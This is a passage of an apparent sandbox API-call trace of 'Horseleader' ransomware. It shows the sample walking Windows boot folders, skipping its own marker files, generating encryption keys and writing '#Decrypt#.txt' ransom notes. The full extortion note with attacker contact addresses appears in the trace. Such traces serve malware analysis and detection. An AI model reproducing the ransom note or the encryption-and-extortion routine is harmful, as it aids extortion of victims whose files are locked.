lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0121.689] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.690] GetProcessHeap () returned 0x780000 [0121.690] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.690] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0121.690] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.691] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.691] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0121.691] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.691] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.691] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.691] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0121.691] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.691] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.692] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.692] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0121.692] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.692] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.692] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.692] lstrlenW (lpString=".testttjffg") returned 11 [0121.692] StrStrW (lpFirst="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.693] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.693] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.693] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.693] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.693] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\#Decrypt#.txt") returned 31 [0121.694] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\#Decrypt#.txt" (normalized: "c:\\boot\\de-de\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.694] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.694] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.696] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.696] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.696] CloseHandle (hObject=0x200) returned 1 [0121.696] GetProcessHeap () returned 0x780000 [0121.697] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.697] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="el-GR", cAlternateFileName="")) returned 1 [0121.697] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0121.697] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0121.697] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0121.697] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0121.697] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.697] GetProcessHeap () returned 0x780000 [0121.697] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.698] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0121.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.698] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.698] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0121.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.699] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.699] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.699] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0121.699] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.699] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.699] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.699] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0121.700] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.700] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.700] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.700] lstrlenW (lpString=".testttjffg") returned 11 [0121.700] StrStrW (lpFirst="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.700] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.700] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.701] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.707] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.707] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.708] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\#Decrypt#.txt") returned 31 [0121.708] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\#Decrypt#.txt" (normalized: "c:\\boot\\el-gr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.708] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.708] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.710] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.710] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.710] CloseHandle (hObject=0x200) returned 1 [0121.711] GetProcessHeap () returned 0x780000 [0121.711] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.711] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="en-US", cAlternateFileName="")) returned 1 [0121.711] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0121.711] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0121.711] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0121.712] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0121.712] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.712] GetProcessHeap () returned 0x780000 [0121.712] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.712] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0121.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.713] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.713] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0121.713] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.713] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.713] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.713] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0121.713] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.713] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.714] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.714] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0121.714] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.714] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.714] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.714] lstrlenW (lpString=".testttjffg") returned 11 [0121.714] StrStrW (lpFirst="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.715] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.715] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.715] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.715] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0121.715] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0121.715] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0121.716] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.716] lstrcmpW (lpString1="memtest.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.716] lstrcmpW (lpString1="memtest.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.716] lstrlenW (lpString=".testttjffg") returned 11 [0121.716] StrStrW (lpFirst="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 